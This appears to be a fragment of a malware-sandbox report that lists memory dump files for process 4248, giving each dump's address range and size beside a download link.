memory/4248-39-0x0000000007970000-0x0000000007A06000-memory.dmp

Filesize
600KB

Download
memory/4248-40-0x0000000007900000-0x0000000007922000-memory.dmp

Filesize
136KB

Download
memory/4248-41-0x0000000008B70000-0x0000000009114000-memory.dmp

Filesize
5.6MB

Download
memory/4248-34-0x00000000061C0000-0x0000000006514000-memory.dmp

Filesize
3.3MB

Download
memory/4248-43-0x0000000009120000-0x000000000D061000-memory.dmp

Filesize
63.3MB

Download
memory/4248-24-0x0000000006050000-0x00000000060B6000-memory.dmp

Filesize
408KB

Download
memory/4248-35-0x00000000066B0000-0x00000000066CE000-memory.dmp

Filesize
120KB

Download
memory/4248-22-0x0000000005810000-0x0000000005832000-memory.dmp

Filesize
136KB

Download
memory/4248-48-0x000000007444E000-0x000000007444F000-memory.dmp

Filesize
4KB

Download
memory/4248-49-0x0000000074440000-0x0000000074BF0000-memory.dmp

Filesize
7.7MB

Download
memory/4248-51-0x0000000074440000-0x0000000074BF0000-memory.dmp

Filesize
7.7MB

Download
memory/4248-21-0x0000000074440000-0x0000000074BF0000-memory.dmp

Filesize
7.7MB

Download
memory/4248-55-0x0000000074440000-0x0000000074BF0000-memory.dmp

Filesize
7.7MB

Download
memory/4248-19-0x00000000058C0000-0x0000000005EE8000-memory.dmp

Filesize
6.2MB

Download
memory/4248-18-0x0000000002D80000-0x0000000002DB6000-memory.dmp

Filesize
216KB

Download
memory/4248-17-0x000000007444E000-0x000000007444F000-memory.dmp

Filesize
4KB

Download